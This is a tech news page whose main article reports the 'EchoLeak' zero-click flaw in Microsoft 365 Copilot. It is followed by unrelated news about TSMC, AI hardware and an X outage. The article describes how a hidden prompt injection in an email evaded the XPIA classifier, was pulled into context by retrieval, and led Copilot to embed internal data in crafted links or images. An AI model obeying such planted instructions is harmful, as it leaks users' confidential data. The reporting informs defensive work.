Researchers find 'dangerous' AI data leak flaw in Microsoft 365 Copilot: What the company has to say
A critical artificial intelligence (AI) vulnerability has been discovered in
Microsoft
365 Copilot, raising new concerns about data security in AI-integrated enterprise environments. The flaw, dubbed 'EchoLeak', which enabled attackers to exfiltrate sensitive user data with zero-click interaction, has been devised by
Aim Labs researchers
in January 2025.
According to a report by Bleeping Computer, Aim Labs promptly reported their findings to Microsoft, which rated it as critical. Microsoft swiftly addressed the issue, implementing a server-side fix in May 2025. This means that no user action is required to patch the vulnerability.
Microsoft has also stated there is no evidence of any real-world exploitation, essentially confirming that no customers were impacted by this flaw.
What is EchoLeak attack and how it worked
by Taboola
by Taboola
Sponsored Links
Sponsored Links
Promoted Links
Promoted Links
You May Like
Trade Bitcoin & Ethereum – No Wallet Needed!
IC Markets
Start Now
Undo
The EchoLeak attack commenced with a malicious email sent to the target. This email contained text seemingly unrelated to Copilot, designed to resemble a typical business document. It embedded a hidden prompt injection crafted to instruct Copilot's underlying LLM to extract sensitive internal data. Because this hidden prompt was phrased like a normal message, it cleverly bypassed Microsoft's existing XPIA (cross-prompt injection attack) classifier protections.
Microsoft 365 Copilot, an AI assistant integrated into Office applications like Word, Excel, Outlook, and Teams, leverages OpenAI's GPT models and Microsoft Graph to help users generate content, analyse data and answer questions based on their organisation's internal files, emails, and chats.
When the user prompted Copilot with a related business question, Microsoft's Retrieval-Augmented Generation (RAG) engine retrieved the malicious email into the LLM's prompt context due to its apparent relevance and formatting. Once inside the LLM's active context, the malicious injection "tricked" the AI into pulling sensitive internal data and embedding it into a specially crafted link or image.
This led to unintentional leaks of internal data without explicit user intent or interaction.
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
Time of India
an hour ago
- Time of India
TSMC market share rises to 68% in Q1, extending global foundry lead
Taiwan Semiconductor Manufacturing Co (TSMC) has further solidified its dominance in the global pure-play wafer foundry market, growing its market share to 67.6% in the first quarter of this year, according to a report by Taipei-based research firm TrendForce Corp, reported by Focus Taiwan. Although TSMC's revenue declined by 5% quarter-on-quarter to $25.52 billion due to seasonal slowdowns, the company's market share still edged up from 67.1% in the previous quarter. TrendForce attributed this performance to continued strong demand for artificial intelligence (AI) and high-performance computing (HPC) applications, as well as accelerated client orders seeking to mitigate risks from ongoing U.S. tariff policies. TSMC's closest competitor, South Korea's Samsung Electronics, saw its market share fall to 7.7%, down from 8.1% in the prior quarter. Samsung's foundry sales dropped by 11.3% to $2.89 billion over the same period. Play Video Pause Skip Backward Skip Forward Unmute Current Time 0:00 / Duration 0:00 Loaded : 0% 0:00 Stream Type LIVE Seek to live, currently behind live LIVE Remaining Time - 0:00 1x Playback Rate Chapters Chapters Descriptions descriptions off , selected Captions captions settings , opens captions settings dialog captions off , selected Audio Track Picture-in-Picture Fullscreen This is a modal window. Beginning of dialog window. Escape will cancel and close the window. Text Color White Black Red Green Blue Yellow Magenta Cyan Opacity Opaque Semi-Transparent Text Background Color Black White Red Green Blue Yellow Magenta Cyan Opacity Opaque Semi-Transparent Transparent Caption Area Background Color Black White Red Green Blue Yellow Magenta Cyan Opacity Transparent Semi-Transparent Opaque Font Size 50% 75% 100% 125% 150% 175% 200% 300% 400% Text Edge Style None Raised Depressed Uniform Drop shadow Font Family Proportional Sans-Serif Monospace Sans-Serif Proportional Serif Monospace Serif Casual Script Small Caps Reset restore all settings to the default values Done Close Modal Dialog End of dialog window. by Taboola by Taboola Sponsored Links Sponsored Links Promoted Links Promoted Links You May Like Elegant New Scooters For Seniors In 2024: The Prices May Surprise You Mobility Scooter | Search Ads Learn More Undo China's Semiconductor Manufacturing International Corp. (SMIC) maintained its third-place ranking with a 6.0% market share, ahead of Taiwan's United Microelectronics Corp (UMC) at 4.7%, and US-based GlobalFoundries at 4.2%. Rounding out the top 10 were China's Huahong Group (2.7%), Taiwan's Vanguard International Semiconductor Corp. (1.0%), Israel's Tower Semiconductor (0.9%, or $35.8 billion), China's NexChip (0.9 per cent, or $35.3 billion), and Taiwan's Powerchip Semiconductor Manufacturing Corp. (0.9%, or 32.7 billion). Live Events TrendForce noted that the top 10 foundries accounted for a combined USD 36.40 billion in sales during the first quarter, representing about 97% of the global total--an increase from 96 per cent in the previous quarter--despite an overall 5.4% drop in revenue across the group. Discover the stories of your interest Blockchain 5 Stories Cyber-safety 7 Stories Fintech 9 Stories E-comm 9 Stories ML 8 Stories Edtech 6 Stories
Time of India
4 hours ago
- Time of India
Big tech on a quest for ideal AI device
ChatGPT-maker OpenAI has enlisted the legendary designer behind the iPhone to create an irresistible gadget for using generative artificial intelligence (AI). The ability to engage digital assistants as easily as speaking with friends is being built into eyewear, speakers, computers and smartphones, but some argue that the Age of AI calls for a transformational new gizmo. "The products that we're using to deliver and connect us to unimaginable technology are decades old," former Apple chief design officer Jony Ive said when his alliance with OpenAI was announced. by Taboola by Taboola Sponsored Links Sponsored Links Promoted Links Promoted Links You May Like Air conditioners without external unit. (click to see prices) Air Condition | Search Ads Search Now Undo "It's just common sense to at least think, surely there's something beyond these legacy products." Sharing no details, OpenAI chief executive Sam Altman said that a prototype Ive shared with him "is the coolest piece of technology that the world will have ever seen." Live Events According to several US media outlets, the device won't have a screen, nor will it be worn like a watch or broach. Discover the stories of your interest Blockchain 5 Stories Cyber-safety 7 Stories Fintech 9 Stories E-comm 9 Stories ML 8 Stories Edtech 6 Stories Kyle Li, a professor at The New School, said that since AI is not yet integrated into people's lives, there is room for a new product tailored to its use. The type of device won't be as important as whether the AI innovators like OpenAI make "pro-human" choices when building the software that will power them, said Rob Howard of consulting firm Innovating with AI Learning from flops The industry is well aware of the spectacular failure of the AI Pin, a square gadget worn like a badge packed with AI features but gone from the market less than a year after its debut in 2024 due to a dearth of buyers. The AI Pin marketed by startup Humane to incredible buzz was priced at $699. Now, Meta and OpenAI are making "big bets" on AI-infused hardware, according to CCS Insight analyst Ben Wood. OpenAI made a multi-billion-dollar deal to bring Ive's startup into the fold. Google announced early this year it is working on mixed-reality glasses with AI smarts, while Amazon continues to ramp up Alexa digital assistant capabilities in its Echo speakers and displays. Apple is being cautious embracing generative AI, slowly integrating it into iPhones even as rivals race ahead with the technology. Plans to soup up its Siri chatbot with generative AI have been indefinitely delayed. The quest for creating an AI interface that people love "is something Apple should have jumped on a long time ago," said Futurum research director Olivier Blanchard. Time to talk Blanchard envisions some kind of hub that lets users tap into AI, most likely by speaking to it and without being connected to the internet. "You can't push it all out in the cloud," Blanchard said, citing concerns about reliability, security, cost, and harm to the environment due to energy demand. "There is not enough energy in the world to do this, so we need to find local solutions," he added. Howard expects a fierce battle over what will be the must-have personal device for AI, since the number of things someone is willing to wear is limited and "people can feel overwhelmed." A new piece of hardware devoted to AI isn't the obvious solution, but OpenAI has the funding and the talent to deliver, according to Julien Codorniou, a partner at venture capital firm 20VC and a former Facebook executive. OpenAI recently hired former Facebook executive and Instacart chief Fidji Simo as head of applications, and her job will be to help answer the hardware question. Voice is expected by many to be a primary way people command AI. Google chief Sundar Pichai has long expressed a vision of "ambient computing" in which technology blends invisibly into the world, waiting to be called upon. "There's no longer any reason to type or touch if you can speak instead," Blanchard said. "Generative AI wants to be increasingly human" so spoken dialogues with the technology "make sense," he added. However, smartphones are too embedded in people's lives to be snubbed any time soon, said Wood.
Time of India
4 hours ago
- Time of India
Elon Musk's X sees partial recovery after outage hits US users
Social media platform X showed signs of recovery on Saturday after an outage disrupted access for thousands of users in the United States, according to outage tracking website Downdetector .com. Reports of disruptions had dropped to around 1,041 by 7:42 p.m. ET, down from a peak of more than 10,000, according to Downdetector, which tracks outages by collating status reports from various sources. Downdetector's numbers are based on user-submitted reports. The actual number of affected users may vary. by Taboola by Taboola Sponsored Links Sponsored Links Promoted Links Promoted Links You May Like Thon Bau Ngu: Unsold Furniture Liquidation 2024 (Prices May Surprise You) Unsold Furniture | Search Ads Learn More In May, Musk, who spent nearly $300 million to back U.S. President Donald Trump's presidential campaign and other Republicans last year, said he'll resume working '24/7' at his companies. "Back to spending 24/7 at work and sleeping in conference/server/factory rooms. I must be super focused on X/xAI and Tesla (plus Starship launch next week), as we have critical technologies rolling out," Musk had said in an X post. Live Events "As evidenced by the X uptime issues this week, major operational improvements need to be made," he added. Discover the stories of your interest Blockchain 5 Stories Cyber-safety 7 Stories Fintech 9 Stories E-comm 9 Stories ML 8 Stories Edtech 6 Stories Earlier in March, Musk had blamed a cyberattack after a similar outage at X. X did not immediately respond to a Reuters request for comment.
